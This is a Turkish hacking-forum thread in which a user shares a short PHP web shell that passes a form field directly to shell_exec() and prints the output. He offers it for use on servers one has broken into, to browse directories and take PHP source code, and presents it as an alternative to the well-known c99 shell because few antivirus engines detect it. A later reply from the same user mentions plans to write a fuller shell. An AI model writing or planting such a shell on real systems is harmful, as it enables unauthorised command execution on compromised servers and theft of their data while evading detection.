PHP ile sunucuda komut çalıştıralım.

icehead

Uzman üye
19 Şub 2022
1,137
833
Merhaba, bugün sizler ile PHP kullanarak sızdığımız veya kendimize ait sunucuda komut çalıştırmayı göstereceğim.
html ile bir form yazdım gerisi kodlarda vardır.

bunu farklı amaçlar için kullanabilirsiniz misal c99 gibi shelller antivirusler tarafından algılanır amacınız sunucudaki php kodlarını almak,dizinlerde gezmek ise birebirdir.


virus taraması sonucu(sadece 2 antivirus yakalıyor):VirusTotal

html> <form method="POST"> <b>kodunuzu giriniz:</b> <input type="text" name="veri"> <input type="submit" value="Gönder"> </form> <?php if($_POST) { echo "Girilen veri: ".$_POST["veri"]; $veri=shell_exec($_POST["veri"]); echo"<br>"; print(" <br> $veri <br>"); } ?> </html>

örnek resimler:


o1ilodk.jpg

m85xjum.jpg
 

icehead

Uzman üye
19 Şub 2022
1,137
833
Veri tabanına bağlanmamışsın. Bağlanacaksan PDO kullanmanı öneririm. Daha güvenli.
Aslında kendi shellimi yazacam forumda küçük küçük konular açıyorum ki belki ilgi çeker.
PHP'ye yeni başladım ama c#,java,c/c++ gibi dillerde temelim olduğu için çok çok hızlı gelişiyorum bakalım sonumuz ne olacak :)
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.